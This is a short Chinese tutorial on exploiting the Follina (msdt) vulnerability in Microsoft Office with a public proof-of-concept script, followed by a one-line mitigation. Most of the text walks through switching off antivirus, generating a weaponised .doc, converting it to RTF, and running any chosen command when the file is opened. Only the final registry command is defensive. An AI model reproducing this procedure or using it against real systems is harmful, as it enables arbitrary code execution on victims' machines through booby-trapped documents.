【教程】利用msdt-follina漏洞执行代码及防范方法

利用

注意，操作时请关闭杀软

1. 下载或克隆项目https://github.com/JohnHammond/msdt-follina到本地

2. 如果你还没有安装 python（安装了点击这里 跳过），请前往https://www.python.org/downloads/下载 python 并安装（tip：在安装时，一定要记得勾选 Add Python to PATH）

3. 到https://visualstudio.microsoft.com/zh-hans/visual-cpp-build-tools/，点击下载生成工具。

下载完成后打开，会弹出安装窗口

按照我的截图进行勾选，并点击右下角的 Install（安装时间稍微会有点长，耐心等待），等待安装完成
安装完成后，运行以下指令安装依赖

pip install netifaces

4. 在克隆下来的项目文件夹中打开一个终端（或 cmd），输入 ipconfig 查看主机的 ip 地址（IPv4 Address 后面的，一般类似192.168.x.x）

5. 运行以下指令

python .\follina.py -i 192.168.50.163 -c "notepad"

其中：
192.168.50.163要替换成你你的 ip，notepad替换成你要执行的命令

6. 如果运行正确的话，项目文件夹中会出现 follina.doc 文件（不要关闭和结束正在运行的终端），但这个文件暂时还不能使用。我们使用 word 打开（可以在虚拟机操作），将 word 另存为rtf（rich text format）格式的文件

7. 打开 rtf 文件，漏洞成功执行，终端产生输出

（tip：生成文件后全程需要保持程序运行，因为文件会连接这个程序完成代码的执行，如果关闭程序代码就无法执行）

防范

打开管理员的终端（或 cmd）运行以下指令：

reg delete HKEY_CLASSES_ROOT\ms-msdt /f